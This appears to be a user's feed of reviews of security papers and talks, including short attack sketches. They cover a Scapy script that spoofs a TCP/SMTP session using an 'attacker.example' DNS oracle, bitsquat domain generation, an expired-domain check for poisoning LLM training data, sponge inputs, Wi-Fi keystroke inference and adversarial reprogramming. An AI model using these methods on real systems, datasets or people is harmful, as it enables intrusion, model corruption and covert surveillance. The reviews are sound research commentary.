Reviews and Comments

Jacob T.

jacob@knowledgehub.social

Joined 1 year, 7 months ago


Did you know that if you change a single bit from 1 to 0 (or …

I loved that they put in the work and it paid off!

5 stars

While there is flashier theoretical work out there, this talk showed how the speakers put in the engineering work and had it pay off on something that isn't theoretically new. Basically, they built a bitsquatting system that handles DNS, SSL cert issuance, and HTTP/IMAP/SMTP for a domain one bit off from the target (e.g., coogle.com instead of google.com). The technique has been around for years, but past implementations were crufty and mostly built just to give a talk. These folks invested heavily in the tooling and showed how quickly it paid off: thousands of OAuth creds from Fortune 500 companies, 15k emails with scanned documents, etc.
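For anyone unfamiliar with the trick, here's a minimal sketch of the enumeration step (my own illustration, not their tooling): generate every domain that is a single bit-flip away from a target and keep the ones that are still valid hostnames.

```python
import string

def bitsquat_candidates(domain: str) -> list[str]:
    allowed = set(string.ascii_lowercase + string.digits + "-")
    label = domain.split(".")[0]               # only flip bits in the first label, not the TLD
    out = []
    for i, ch in enumerate(label):
        for bit in range(8):
            flipped = chr(ord(ch) ^ (1 << bit)).lower()
            if flipped in allowed and flipped != ch:
                out.append(domain[:i] + flipped + domain[i + 1:])
    return sorted(set(out))

print(bitsquat_candidates("google.com"))       # includes "coogle.com" ('g' ^ 0x04 == 'c')
```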

They assumed they'd see more hits during the solar storm but didn't see anything, which lines up with a paper that appears to show cosmic rays are not the cause of in-memory bit-flips. They also spent a bit of time discussing …

Discussion of AI and its applications to security seems unavoidable nowadays, and, alas, this keynote …

A nice summary of the space

4 stars

As someone who sees a lot of LLM & security research, this keynote is a nice summary of where LLMs will likely add value (or already have), and where they will never help regardless of how capable they become.

In short, using LLMs to generate individual inputs is orders of magnitude too slow to outpace the sheer speed of random/semi-random mutation. Using LLMs to write fuzzing harnesses and the generator logic that produces inputs will pay off: LLMs can ingest specs and code, and revise their output to get past coverage blocks.
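To make the harness/generator point concrete, here's a toy sketch of what I mean (the `parse_config` target and the config schema are made up): the generator logic is the part worth having an LLM write from a spec, and once it exists, plain randomness produces millions of structured inputs far faster than an LLM ever could.

```python
import json
import random
import string

def random_config() -> bytes:
    # Structured, spec-aware generation reaches deep parser states that blind
    # byte mutation rarely finds.
    cfg = {
        "version": random.choice([1, 2, 99]),
        "name": "".join(random.choices(string.ascii_letters, k=random.randint(0, 64))),
        "retries": random.randint(-1, 2**31),
        "endpoints": [f"host{i}:{random.randint(0, 70000)}"
                      for i in range(random.randint(0, 5))],
    }
    return json.dumps(cfg).encode()

def fuzz(parse_config, iterations=1_000_000):
    for _ in range(iterations):
        try:
            parse_config(random_config())   # hypothetical target under test
        except ValueError:
            pass                            # expected rejections; anything else is a finding
```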

TCP spoofing—the attack to establish an IP-spoofed TCP connection by bruteforcing a 32-bit server-chosen initial …

Eye-opening *and* clever

4 stars

Going into this read, I figured that IP spoofing was niche in both availability and applicability, especially in our TLS-dominated world. However, federated services such as SMTP, as well as database replication, commonly use IP addresses for validation.

There are two core new discoveries here: a TCP stack weakness that dramatically shrinks the search space for brute-forcing the correct ISN to continue a TCP session (as few as four guesses!), and a few techniques for determining the ISN outright. Of these, the application-specific ones are cute and reliable. SMTP is the easiest to explain: if you host your own DNS server for an attacker-controlled domain, you can spoof a handshake that includes a "HELO .attacker.com". Once you get a hit on that DNS server, you know the correct ISN and can continue the session. Coupled with SPF records, which specify which IPs/domains can send email on behalf of a domain, …
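Here's roughly how I understood the SMTP oracle, as a Scapy sketch with made-up addresses and a placeholder guess list (the real candidate set comes from the stack weakness described in the paper):

```python
from scapy.all import IP, TCP, Raw, send

SPOOFED_SRC = "203.0.113.10"    # an IP the SMTP server trusts (hypothetical)
TARGET = "198.51.100.25"        # victim SMTP server (hypothetical)
SPORT, DPORT = 40000, 25
MY_ISN = 1000

# 1. Spoofed SYN: the SYN-ACK goes to SPOOFED_SRC, so we never see the server's ISN.
send(IP(src=SPOOFED_SRC, dst=TARGET) /
     TCP(sport=SPORT, dport=DPORT, flags="S", seq=MY_ISN), verbose=False)

# 2. For each candidate server ISN, complete the handshake blindly and send a HELO
#    whose hostname encodes the guess.
candidate_isns = [0x1000, 0x2000, 0x3000, 0x4000]   # placeholder; derived from the weakness
for guess in candidate_isns:
    helo = f"HELO g{guess}.attacker.example\r\n"
    send(IP(src=SPOOFED_SRC, dst=TARGET) /
         TCP(sport=SPORT, dport=DPORT, flags="PA", seq=MY_ISN + 1, ack=guess + 1) /
         Raw(load=helo), verbose=False)

# 3. Only the segment with the correct ack is accepted; when the server resolves the
#    HELO name, a query for g<ISN>.attacker.example shows up at our DNS server.
```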

Deep learning models are often trained on distributed, web-scale datasets crawled from the internet. In …

Empirical evidence of LLM attacker economics

5 stars

With the race to collect and train on ever more data (and re-train on the latest data more quickly), LLM creators' ability to perform even cursory checks against training-set corruption is almost nil. This paper shows two ways an attacker can corrupt 0.01-1% of an LLM training dataset for a reasonable sum. Existing work has shown that, for a specific desired error state, poisoning 0.01% of the training data can yield a 60-90% chance of tampering with model performance.

There are two core primitives presented in this paper: 1. The corpora are distributed as a metadata archive of URLs, with the actual content fetched by each consumer. There are enough expired domains among those URLs that an attacker can buy some and corrupt a percentage of what gets scraped (a quick check for this idea is sketched below). 2. Wikipedia is converted into a timestamped dump (e.g., a ZIM file) in a predictable order and on a predictable schedule. By changing …
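A minimal sketch of the check behind the first primitive (hypothetical URLs, with DNS resolution as a crude stand-in for "expired and re-registerable"):

```python
import socket
from urllib.parse import urlparse

def unresolvable_domains(urls):
    """Flag hosts from a dataset's URL metadata that no longer resolve."""
    dead = set()
    for url in urls:
        host = urlparse(url).hostname
        if not host:
            continue
        try:
            socket.gethostbyname(host)
        except socket.gaierror:        # NXDOMAIN / no record: a candidate for re-registration
            dead.add(host)
    return dead

print(unresolvable_domains([
    "http://long-gone-blog.example/post/1.html",      # made-up entries
    "https://en.wikipedia.org/wiki/Main_Page",
]))
```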

The high energy costs of neural network training and inference led to the use of …

A devious optimization goal

5 stars

This paper explores inputs to DNN models that cause an asymptotic (worst-case) increase in power usage or latency. Using genetic algorithms in a white-box setting, the researchers could find image and text inputs that drive up inference effort.

The results were impressive: a 6000x slowdown on a hosted Azure translation model.
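A toy sketch of the search loop as I understood it (not the paper's code; `model`, `seed`, and `mutate` are whatever you're attacking): keep whichever candidate inputs take the longest to run through the model.

```python
import copy
import random
import time

def latency(model, x):
    t0 = time.perf_counter()
    model(x)                               # any callable works for the sketch
    return time.perf_counter() - t0

def sponge_search(model, seed, mutate, pop_size=32, generations=50):
    population = [copy.deepcopy(seed) for _ in range(pop_size)]
    for _ in range(generations):
        ranked = sorted(population, key=lambda x: latency(model, x), reverse=True)
        parents = ranked[: pop_size // 4]  # keep the slowest-to-process inputs
        children = [mutate(copy.deepcopy(random.choice(parents)))
                    for _ in range(pop_size - len(parents))]
        population = parents + children
    return max(population, key=lambda x: latency(model, x))
```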

The contact-free sensing nature of Wi-Fi has been leveraged to achieve privacy breaches, yet existing …

Pretty amazing accuracy for an eavesdroppable side-channel

5 stars

This paper explores recovering a victim's key presses through a Wi-Fi data channel known as Beamforming Feedback Information (BFI). BFI helps wireless APs adjust their beamforming transmissions to improve performance, but it carries data that correlates with changes in device orientation and with attenuation from nearby movement (e.g., fingers on a keyboard). By training a neural network, the researchers were able to recover key presses on a numeric keypad with ~88% accuracy across a variety of devices.

Pretty impressive, and shows how difficult it is to account for side-channels across all the layers of the stack when it's relatively easy to train a very sensitive ML model to extract a tiny signal from the noise.
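For a rough sense of the pipeline (synthetic stand-in data, not the paper's BFI captures or architecture), the classification step is about this simple once the BFI windows are collected and labelled:

```python
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.neural_network import MLPClassifier

# Synthetic stand-in: 2000 windows of 256 BFI-derived features, each labelled with
# the digit (0-9) that was pressed while the window was captured.
rng = np.random.default_rng(0)
X = rng.normal(size=(2000, 256))
y = rng.integers(0, 10, size=2000)

X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.2, random_state=0)
clf = MLPClassifier(hidden_layer_sizes=(256, 64), max_iter=300).fit(X_tr, y_tr)
print("held-out accuracy:", clf.score(X_te, y_te))   # ~10% on noise; ~88% in the paper
```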

Sparks (2023, Oxford University Press, Incorporated) 5 stars

Powerful

5 stars

A frank look at the long-term and ongoing rewriting of history by the CCP, as well as the brave few who continue to document and catalog the past as a time capsule for future generations.

Amazing how one of the largest man-made mass-death events remains little known and almost never studied in Western histories. This book opens more questions than it answers, but helpfully comes with a guide for where to go next to learn more.

Not particularly cheery, but there is a glimmer of hope that shines throughout.

HECO: Fully Homomorphic Encryption Compiler (2023, Arxiv) 4 stars

In recent years, Fully Homomorphic Encryption (FHE) has undergone several breakthroughs and advancements, leading to …

An improvement in usability

4 stars

This paper covers a compiler that converts more traditional imperative code into optimized (and batched) FHE operations via the SEAL library. The frontend is Python, which is then lowered through multiple simplification and optimization passes implemented in C++ on top of MLIR.
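To give a flavor of the input side (ordinary Python here, not HECO's actual frontend syntax), this is the kind of imperative kernel such a compiler takes and maps onto the SIMD slots of a single ciphertext, rather than one ciphertext per element:

```python
# A scalar loop like this is natural to write but maps poorly onto FHE by hand;
# a batching compiler turns the elementwise work into slot-parallel ciphertext ops
# and the reduction into a log-depth series of rotations and additions.
def squared_distance(x: list[int], y: list[int]) -> int:
    total = 0
    for xi, yi in zip(x, y):
        total += (xi - yi) * (xi - yi)
    return total
```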

Both synthetic/toy examples and more real-world applications are implemented three ways: as pure imperative code (which requires non-performant emulation steps), compiled with HECO, and hand-built with manual FHE optimizations. HECO's performance is close to the hand-optimized versions in most scenarios, even edging them out in a few.

Hopefully the spread of this tool will help FHE reach the masses.

Machine learning has progressed significantly in various applications ranging from face recognition to text generation. …

Less plausible than Adversarial Reprogramming

3 stars

This paper covers a highly effective (85%+) hijacking attack in which an adversary taints the training data so that the model can later be cajoled into performing other kinds of tasks. While this work is a step closer to a more general type of attack, the threat model is less plausible than the inference-time attacks popularized in the Adversarial Reprogramming literature.

Deep neural networks are susceptible to *adversarial* attacks. In computer vision, well-crafted perturbations to images …

The first "RCE" against ML that I came across

5 stars

I have sent this paper to a number of people over the years since it first came out, and I'm surprised this type of attack gets so little attention, even though it requires white-box access to the model. It's the first class of attack that lets the attacker reprogram an image-classification model to perform an attacker-chosen task (e.g., turning an image classifier into a counting model).
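The recipe, as a rough PyTorch sketch with a toy frozen network and a made-up binary task (nothing here is the paper's exact setup): learn one additive "program" around small inputs so that the frozen classifier's outputs, under a fixed label mapping, solve the new task.

```python
import torch
import torch.nn as nn

frozen = nn.Sequential(nn.Flatten(), nn.Linear(28 * 28, 10))   # stand-in for a pretrained net
for p in frozen.parameters():
    p.requires_grad_(False)

program = torch.zeros(1, 1, 28, 28, requires_grad=True)        # the learned "program"
opt = torch.optim.Adam([program], lr=0.05)

def embed(x_small):
    # Place the 14x14 new-task input in the center and add the program around it.
    canvas = torch.zeros(x_small.size(0), 1, 28, 28)
    canvas[:, :, 7:21, 7:21] = x_small
    return canvas + torch.tanh(program)

label_map = lambda logits: logits[:, :2]   # fixed mapping: reuse the first two output classes

for _ in range(200):                        # train only the program on the attacker's task
    x_small = torch.rand(64, 1, 14, 14)     # synthetic stand-in for the new task's data
    y_new = (x_small.mean(dim=(1, 2, 3)) > 0.5).long()   # toy binary target
    loss = nn.functional.cross_entropy(label_map(frozen(embed(x_small))), y_new)
    opt.zero_grad()
    loss.backward()
    opt.step()
```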

Reviewing this paper 5 years after its release, it still holds up, and I see there is a small field of work in this lineage that includes similar attacks against NLP classifiers. I would count this paper as the starting point for this class of attack, which has grown into an impressive and high-impact field.

Short Message Service (SMS) remains one of the most popular communication channels since its introduction …

An improvement over the state-of-the-art with real-world consequences

3 stars

While silent SMSes have been used by authorities for quite some time to geolocate cell phones, this work puts a less powerful version of that capability into anyone's hands. By training an ML model on the RTTs of silent SMSes sent to phones in different [known] locations, a temporal map of the GSM network can be built and later used to classify the RTTs measured against a victim's phone, approximating their location to the country/region level.

Without the cooperation of the cellular infrastructure it's pretty coarse-grained, but it's still a scary way to figure out where a target of interest is without alerting them.